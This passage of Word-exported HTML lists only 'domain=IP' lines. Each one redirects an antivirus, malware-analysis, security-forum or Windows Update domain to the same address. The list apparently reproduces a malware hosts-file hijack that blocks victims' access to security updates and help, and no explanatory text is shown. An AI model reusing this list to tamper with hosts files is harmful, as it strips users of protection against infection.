<span style="font-family: Arial; font-size: 10.0pt;">2-viruses.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trojan-killer.ne=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusinfo.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusinfo.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">projecthoneypot.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.projecthoneypot.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">novirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.novirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-malware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-malware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">offensivecomputing.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.offensivecomputing.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">zeustracker.abuse.ch=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zeustracker.abuse.ch=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.malekal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www3.malekal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.malekal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.threatexpert.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatexpert.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virustotal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusscan.jotti.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-comparatives.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-comparatives.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-test.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-test.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.scanwith.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kasperskyanz.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vet.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sm.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">home.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">toolbar.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">stats.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusbtn.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">adwarereport.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.adwarereport.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dw.com.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nss-shasta-rrs.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spywarewarrior.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spywarewarrior.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avsoft.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avsoft.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">onecare.live.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anubis.iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wepawet.iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.freespaceinternetsecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freespaceinternetsecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sunbelt-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sunbelt-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.prevx.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">prevx.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">analysis.seclab.tuwien.ac.at=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.joebox.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">joebox.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gmer.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.gmer.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antirootkit.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.antirootkit.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sectools.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sandboxie.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sandboxie.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nepenthes.mwcollect.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mwcollect.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.amtso.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">amtso.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nsslabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nsslabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.icsalabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">icsalabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.checkvir.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">checkvir.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.check-mark.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">check-mark.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.protectstar-testlab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">protectstar-testlab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-malware-test.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-malware-test.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-test.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-test.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.wildlist.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wildlist.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.aavar.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">aavar.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">centralops.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.staysafeonline.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">staysafeonline.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.rokop-security.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">rokop-security.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.wilderssecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wilderssecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kaspersky.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avp.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avp.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.viruslist.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">viruslist.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.viruslist.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kaspersky-antivirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky-antivirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads1.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads2.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads3.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads4.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads5.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-us1.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-us2.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-us3.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-eu1.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-eu2.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kavdumps.kaspersky.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kasperskyclub.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.kasperskyclub.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.kasperskyclub.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kasperskyclub.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kasperskyclub.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.kasperskylab.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">data.kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">z-oleg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.z-oleg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freedrweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.freedrweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-desk.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-desk.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dr-web.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.dr-web.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">support.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">updates.sald.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sald.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sald.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.imshop.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">safeweb.norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.safeweb.norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">shop.symantecstore.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">liveupdate.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">liveupdate.symantecliveupdate.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">service1.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.service1.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">security.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">liveupdate.symantec.d4p.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securityresponse.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sygate.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sygate.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">esetnod32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.esetnod32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.su=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.su=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod-32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod-32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">allnod.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.allnod.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">allnod.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.allnod.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusall.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusall.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32eset.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32eset.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.sk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.sk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl1.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl2.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl3.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl4.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-av.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.free-av.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-av.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.free-av.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avira.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www1.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dlpro.antivir.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.forum.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira-antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avira-antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avirus.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avirus.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">home.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">us.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ru.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
